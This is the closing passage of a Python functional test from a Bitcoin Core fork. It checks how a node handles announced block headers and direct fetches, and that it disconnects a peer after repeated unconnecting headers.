test_node.send_header_for_blocks(blocks[2:18])
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks[2:16]], timeout=DIRECT_FETCH_RESPONSE_TIME)
# Announcing 1 more header should not trigger any response
test_node.last_message.pop("getdata", None)
test_node.send_header_for_blocks(blocks[18:19])
test_node.sync_with_ping()
with mininode_lock:
assert "getdata" not in test_node.last_message
self.log.info("Part 4: success!")
# Now deliver all those blocks we announced.
[test_node.send_message(msg_block(x)) for x in blocks]
self.log.info("Part 5: Testing handling of unconnecting headers")
# First we test that receipt of an unconnecting header doesn't prevent
# chain sync.
for i in range(10):
self.log.debug("Part 5.{}: starting...".format(i))
test_node.last_message.pop("getdata", None)
blocks = []
# Create two more blocks.
for j in range(2):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
# Send the header of the second block -> this won't connect.
with mininode_lock:
test_node.last_message.pop("getheaders", None)
test_node.send_header_for_blocks([blocks[1]])
test_node.wait_for_getheaders()
test_node.send_header_for_blocks(blocks)
test_node.wait_for_getdata([x.sha256 for x in blocks])
[test_node.send_message(msg_block(x)) for x in blocks]
test_node.sync_with_ping()
assert_equal(int(self.nodes[0].getbestblockhash(), 16), blocks[1].sha256)
blocks = []
# Now we test that if we repeatedly don't send connecting headers, we
# don't go into an infinite loop trying to get them to connect.
MAX_UNCONNECTING_HEADERS = 10
for j in range(MAX_UNCONNECTING_HEADERS + 1):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
for i in range(1, MAX_UNCONNECTING_HEADERS):
# Send a header that doesn't connect, check that we get a getheaders.
with mininode_lock:
test_node.last_message.pop("getheaders", None)
test_node.send_header_for_blocks([blocks[i]])
test_node.wait_for_getheaders()
# Next header will connect, should re-set our count:
test_node.send_header_for_blocks([blocks[0]])
# Remove the first two entries (blocks[1] would connect):
blocks = blocks[2:]
# Now try to see how many unconnecting headers we can send
# before we get disconnected. Should be 5*MAX_UNCONNECTING_HEADERS
for i in range(5 * MAX_UNCONNECTING_HEADERS - 1):
# Send a header that doesn't connect, check that we get a getheaders.
with mininode_lock:
test_node.last_message.pop("getheaders", None)
test_node.send_header_for_blocks([blocks[i % len(blocks)]])
test_node.wait_for_getheaders()
# Eventually this stops working.
test_node.send_header_for_blocks([blocks[-1]])
# Should get disconnected
test_node.wait_for_disconnect()
self.log.info("Part 5: success!")
# Finally, check that the inv node never received a getdata request,
# throughout the test
assert "getdata" not in inv_node.last_message
if __name__ == '__main__':
SendHeadersTest().main()
|
Flowdalic/bitcoin
|
test/functional/p2p_sendheaders.py
|
Python
|
mit
| 26,404 | 0.002197 |